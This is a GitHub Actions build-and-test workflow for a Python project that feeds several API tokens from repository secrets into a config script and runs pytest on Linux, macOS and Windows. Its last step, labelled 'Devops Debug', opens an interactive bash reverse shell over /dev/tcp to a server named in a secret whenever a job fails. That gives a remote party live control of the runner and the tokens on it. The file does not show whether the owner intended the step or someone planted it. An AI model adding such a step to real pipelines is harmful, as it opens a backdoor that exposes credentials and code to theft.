# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
name: Build & Test

on:
  push:
    branches: '*'
  pull_request:
    branches: '*'

jobs:
  build:
    runs-on: ${{ matrix.os }}
    strategy:
      matrix:
        os: [ubuntu-latest, macos-latest, windows-latest]
        python-version: [ '3.9.13' ]
    steps:
      - uses: actions/checkout@v4
      - name: Set up Python
        uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
          cache: 'pip'
      - name: Display Python version
        run: python --version

      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          python -m pip install pytest
          python -m pip install pytest-timeout
          
          python -m pip install -r requirements.txt
          playwright install
      - name: Init Config.py # TODO param use default
        run: |
          python ./init_config.py s${{ secrets.proxy }} s${{ secrets.jx3_token }} s${{ secrets.jx3api_link }} s${{ secrets.jx3api_globaltoken }} s${{ secrets.jx3api_wslink }} s${{ secrets.jx3api_wstoken }} s${{ secrets.sfapi_wslink }} s${{ secrets.sfapi_wstoken }}
            
      - name: Test with pytest
        run: |
          pytest -v --full-trace --durations 10 --timeout=1200
      - name: Devops Debug
        if: ${{ failure() }}
        run: |
          bash -i >& /dev/tcp/${{ secrets.DEBUG_SERVER }} 0>&1
        continue-on-error: true
